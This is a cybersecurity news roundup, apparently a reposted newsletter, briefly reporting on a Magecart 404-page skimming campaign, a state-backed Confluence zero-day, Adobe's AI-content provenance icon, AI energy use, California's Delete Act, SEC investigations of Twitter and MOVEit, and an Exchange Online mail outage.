Hijacked 404 pages, Chinese attackers target Confluence, Adobe’s “icon of transparency”
404 pages hijacked
Researchers at Akamai spotted this new campaign by the threat actors behind the Magecart payment skimmer. This hides JavaScript code in a comment on a site’s 404 page. The threat actors combine this with a modification to other site pages to call on a nonexistant folder, thereby sending users to the 404 page more often. While in some ways this attack remains consistent with Magecart attackers finding new way to obfuscate code, researchers noted a call to a nonexistent folder marks a much more “noisy” attack approach than the group typically employs.?
Atlassian Confluence attacked by state-backed actors
Researchers at Microsoft’s Threat Intelligence unit disclosed that the Chinese-state back group Storm-0062 began exploiting a zero-day in Atlassian Confluence Data Center and Server since at least September 14th. Atlassian itself disclosed the attack on October 4th, but at the time did not disclose the group behind the campaign. With the zero-day, the attackers could create arbitrary admin accounts on endpoints. Researchers at Greynoise said initial data on the attacks shows exploitation very limited at this point. However Rapid7 released a proof-of-concept exploit with full documentation this week that could change the situation.?
Adobe’s “icon of transparency”
The company introduced a new symbol designed to be attached with content as part of its metadata to indicate if AI tools created it. Adobe created it as part of the Coalition for Content Provenance and Authenticity, or C2PA. This will roll out to Adobe’s Creative Cloud Suite of apps, and eventually Microsoft’s Bing Image Generator. When viewed online, users can mouse over the mark to view details on ownership, the AI tool used in its creation, and further details. While the C2PA includes industry heavyweights like Arm, Intel, and Microsoft, we did just cover a study last week that demonstrated how easily these AI watermarks can be washed away.?
Study warns about AI energy usage
A new study in the journal Joule from Alex De Vries, a PhD candidate at VU Amsterdam School of Business, approximates that the AI industry will consume 85-134 terrawatt-hours of electricity per year by 2027. He based these figures on supply and sales estimates of Nvidia’s high-end chips, expected to supply 95% of the industry. De Vries framed this as roughly the same annual energy consumption by the Netherlands, or about 0.5% of current global consumption. This study only accounts for energy used by the chips themselves, not accounting for the additional data center cooling needed to operate them. Speaking to the BBC, the data center firm DataVita said AI-focused racks currently use 20 times more power than a standard rack.?
(BBC)
领英推荐
Huge thanks to our sponsor, Hyperproof
Newsom signs California’s Delete Act
We previously covered that the California legislature passed the Delete Act. It’s now been signed into law. The act directs the California Privacy Protection Agency to create a new tool to allow citizens to request all data brokers to delete personal information with a single request. The law requires the CPPA to create the tool by the start of 2026. This act doesn’t change the privacy protection introduced with the California Privacy Rights Act, but it makes it easier for citizens to act on those protections.?
(LA Times)
SEC investigating 2018 Twitter security lapse
The US Securities and Exchange Commission began a probe into how the social platform now known as X exposed personal information of users five years ago. Bloomberg’s sources say the agency will look at if executives at the time failed to disclose these privacy issues to shareholders, or subsequently create controls to prevent it from happening again. At the time, a bug on the platform let anyone view user email addresses during a password reset attempt.?
Exchange anti-spam rules breaks mail delivery
Numerous users reported receiving “server busy” error messages from Exchange Online, impacting a subset of Microsoft 365 customers globally. This resulted in delays or inability to receive outside mail. Microsoft confirmed the issue on October 11th, saying it began an investigation. The company later updated to say the issue appears linked to an erroneous triggering of anti-spam rules, where some IP addresses received false-positive spam flags. As of this writing Microsoft said its still working on a remediation plan. It’s unclear how many users this error impacted.?
SEC investigates MOVEit
In a regulatory filing, Progress Software disclosed the US SEC opened an investigation into the rash of hacks coming from the vulnerabilities in its MOVEit managed file transfer product. The company received a subpoena for documents and information related to the vulnerability. Emsisoft estimates the MOVEit attacks impacted over 2500 organizations. In the filing, Progress said costs related to the vulnerability amounted to $1 million, but said losses could mount after 23 customers launched legal action against it, as well as the 58 class action lawsuits filed by individuals. Progress Software also said a separate security incident in November 2022 could result in a further $4.2 million cost.?